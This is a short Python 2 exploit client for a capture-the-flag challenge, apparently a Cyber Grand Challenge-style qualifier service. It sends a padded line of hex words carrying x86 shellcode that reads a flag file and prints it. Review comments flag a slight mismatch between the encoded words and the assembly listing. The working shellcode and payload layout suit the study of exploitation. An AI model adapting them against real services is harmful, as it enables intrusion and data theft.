#!/usr/bin/env python
# Client script for one CTF service (host and port hard-coded below): it
# sends a single crafted line of space-separated hex words over TCP and
# prints whatever the service answers.  Python 2 syntax (print statement).
import socket
# Machine code listed below as 32-bit x86 (%eax/%ebx/%ecx/%edx/%esp,
# int $0x80).  Per the inline comments it reads 0x30 bytes from fd 3
# (the flag file) onto the stack, writes them to fd 1, then exits.
# NOTE(review): the syscall numbers in the comments (1 exit, 2 write,
# 3 read) are the DECREE / Cyber Grand Challenge ABI (terminate,
# transmit, receive), not Linux x86 where write is 4; that agrees with
# the "cybergrandsandbox" hostname, but confirm against the binary.
# b8 03 00 00 00 mov $0x3,%eax # syscall 3 (read)
# bb 03 00 00 00 mov $0x3,%ebx # from fd 3 (flag file)
# 89 e1 mov %esp,%ecx # to stack
# ba 30 00 00 00 mov $0x30,%edx # 0x30 bytes
# cd 80 int $0x80 # perform syscall
# b8 02 00 00 00 mov $0x2,%eax # syscall 2 (write)
# bb 01 00 00 00 mov $0x1,%ebx # to fd 1 (stdout)
# 89 e1 mov %esp,%ecx # from stack
# ba 30 00 00 00 mov $0x30,%edx # 0x30 bytes
# cd 80 int $0x80 # perform syscall
# b8 01 00 00 00 mov $0x1,%eax # syscall 1 (exit)
# bb 00 00 00 00 mov $0x0,%ebx # return code 0
# cd 80 int $0x80 # perform syscall
# The same code encoded as 13 little-endian 32-bit words in *reverse*
# order: the last word, 0x000003b8, holds the first four bytes
# (b8 03 00 00) of the listing above.
# NOTE(review): the encoding does not match the listing exactly -- the
# listing is 50 bytes, the 13 words are 52, and the fourth word
# 0x80cd80cd is two consecutive `int $0x80`, so the write syscall is
# issued twice.  Presumably harmless; confirm which is intended.
shellcode = "0x80cd0000 0x0000bb00 0x000001b8 0x80cd80cd " \
+ "0x00000030 0xbae18900 0x000001bb 0x00000002 " \
+ "0xb880cd00 0x000030ba 0xe1890000 0x0003bb00 " \
+ "0x000003b8 "
# One newline-terminated line: 278 zero words, the 13 shellcode words,
# then three trailing zero words.  How the service parses the words and
# why the 278-word offset is needed is not visible in this file.
payload = "0x0 "*278 + shellcode + "0x0 "*3 + "\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((
'cybergrandsandbox_e722a7ec2ad46b9fb8472db37cb95713.quals.shallweplayaga.me',
4347
))
s.recv(256)  # read and discard the service's greeting (at most 256 bytes)
s.send(payload)
# Only the first 256 bytes of the reply are captured; the socket is never
# closed explicitly (left to interpreter exit).
output = s.recv(256)
print output